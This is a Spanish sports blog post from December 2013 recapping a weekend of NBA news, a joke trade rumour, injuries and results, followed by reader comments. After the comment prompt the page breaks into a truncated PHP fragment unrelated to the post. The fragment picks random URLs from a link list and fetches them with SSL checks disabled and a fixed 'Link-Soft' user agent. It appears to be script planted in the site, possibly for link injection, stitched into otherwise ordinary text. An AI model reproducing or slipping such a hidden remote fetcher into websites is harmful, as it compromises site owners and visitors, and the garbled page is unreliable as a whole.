Informe del fin de semana: The Last

30 de December de 2013 por TheDeerHunter

¡Qué detallazo! Fijáos si los habituales os habéis tomado en serio eso de cubrirnos durante el fin de semana que incluso sois capaces de perpetuar las tradiciones:

El sábado, el usuario nba lanzaba el bombazo: “Ultimas noticias: Dolan en un ataque de cordura y viendo que ya han tirado la temporada, ha aceptado un trade por Melo con los Lakers, en el que estarian incluidos Pau Gasol y Xavier Henry.” A lo que Denise añadía “Y de paso, han hecho un trueque Woodson – D’Antoni …”

A la altura de aquel fichaje de Sloan por los Nets, el regreso de Pau Memphis, o la enésima resurrección de Su Majestad. Alguno ya creíamos que este año se nos pasaba. Gran gesto compañero y excelente idea con una noticia que no hubiera extrañado tanto… El problema es que últimamente el personal está de un incrédulo que no se les aguanta. Deberíais saber que lo que publicamos en TJNBA es ley o casi…

En realidad sí ha sido un fin de semana con bastantes bombazos. Ojalá alguno de ellos hubiera tenido que ver con la tradición del 28 de diciembre. Las lesiones de Westbrook y Horford son lamentables por su propia naturaleza de infortunio, pero lo de Andrew Bynum sí tenía pinta de broma de mal gusto:

“Los Cavs han apartado del equipo a Bynum por “conducta inapropiada para el equipo”, además el 7 de enero, el pivot va a quedar libre porque los Cavs no le van a ejecutar la extensión de contrato no garantizado.” Denise.

En lo deportivo, el viernes traía alegrías para algunos de nuestros más ilustres contertulios. Los Kings derrotaban a los Heat de forma brillante en la prórroga y Orlando hacía lo propio frente a Detroit en lo que según nos comentaba “nuestro corresponsal en Florida” fue el mejor partido de la franquicia en los dos últimos años. Los Warriors parecen también haber encontrado parte de su juego y trituraban a los Suns, consolidándose en zona playoffs.

Como nunca llueve a gusto de todos los numerosos seguidores que tenemos por aquí de Lakers y Knicks soportaban una nueva derrota ante Jazz y Raptors respectivamente. Los canadienses, por cierto, se vuelven a meter en la parte alta del cuadro en su conferencia. Para acabar con la jornada del viernes, los Thunder salieron vivos de Charlotte; los Wolves destrozaron a Washington; Pelicans hacían lo propio con unos Nuggets en barrena, y los Nets lograban derrotar a los Bucks a pesar del teórico nº1 del pasado draft de nuestro Dantley.

El sábado lo más noticioso fue el partidazo de Chris Bosh en Portland con triple ganador para redondear. Los Wolves se daban la merendola de rigor en Milwuakee, y aquí comentábais el impacto ofensivo de Ricky. Mal que nos pese a muchos está siendo un año horroroso en su evolución anotadora, al contrario que Love que volvió a sentar cátedra. En esa imaginaria disputa por el trono de PFs en el oeste, Griffin también cumplió destrozando a Utah. Otro excelente duelo interior, éste real frente a frente, tuvo lugar en Atlanta. Paul Millsap daba un paso adelante y lo hacía ante su ex-compañero Al Jefferson. Los locales terminaron llevándose la victoria tras una prórroga. Nets y Knicks, como suele ser habitual este curso, cayeron, pero esta vez lo hicieron ante equipos en forma, eso sí. Pacers y Raptors respectivamente. Lowry rozó el triple doble. Del resto, victoria de Celtics ante Cavaliers; los Pistons cerraron su fin de semana negro en Washington; Mavericks ganó sin problemas a Chicago; Howard brilló ante Anthony Davis; Grizzlies doblegaron a Nuggets y, en el mejor partido de su carrera, Miles Plumlee contribuyó a que los Suns le endosaran a los Sixers otra derrota más.

Anoche asistimos a una impresionante lección de baloncesto de Durant y sus Thunder ante un duro rival como Houston. Stephen Curry lo bordó también, rozó el triple doble y aún así les costó a los Warriors derrotar a Cleveland. Menos problemas tuvieron los Spurs para doblegar a Cousins y sus Kings con una actuación como en los viejos tiempos de su big three, incluido Manudo. A los Lakers, en cambio, les crecen los enanos y perdieron a Xavier Henry en la derrota ante los Sixers. Y para acabar, Orlando derrotó a Atlanta.

Comenta

6 comentarios a esta entrada

  1. jhc dice:
    #1

    La baja de Al Horford va pesar mucho en Atlanta, para un equipo decente que habia (exceptuando Pacers y Heat) en el Este se quedan sin su piedra angular, las semifinales de conferencia este va a ser un cachondeo para Pacers y Miami

      Citar

  2. Esteban dice:
    #2

    jhc:
    La baja de Al Horford va pesar mucho en Atlanta, para un equipo decente que habia (exceptuando Pacers y Heat) en el Este se quedan sin su piedra angular, las semifinales de conferencia este va a ser un cachondeo para Pacers y Miami

    no solo eso, los Hawks eran el unico equipo del este que no sea miami e indiana con record positivo, y sin Harford, dudo que se mantenga asi por muhco tiempo mas

    las cosas como estan en el este, habra mas de un clasificado con record negativo, increible

      Citar

  3. Josgel dice:
    #3

    Pues vaya lesiones raras tiene Horford. Creo que el año pasado ya se lesionó el pectoral izquierdo cayendose al suelo y ahora el derecho en una acción totalmente distinta.

    Se me pasa por la cabeza Bynum hasta final de año, pero no creo que el GM y el entrenador esten por ello.

      Citar

  4. HisRoyalAirness dice:
    #4

    Los equipos con mejor record a playoffs, independientemente de la conferencia por favor. No me voy a cansar de decirlo..
    No llevaban dos anillos los Heat ni de coña

      Citar

  5. Rompe dice:
    #5

    Dato interesante que he sacado de nba.com

    East vs. West: The West is 100-46 (.685) against the East in inter-conference games

    Ahí lo dejo…

      Citar

  6. NBA Regular Season 2013/14 - Foros Dz dice:
    #6

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>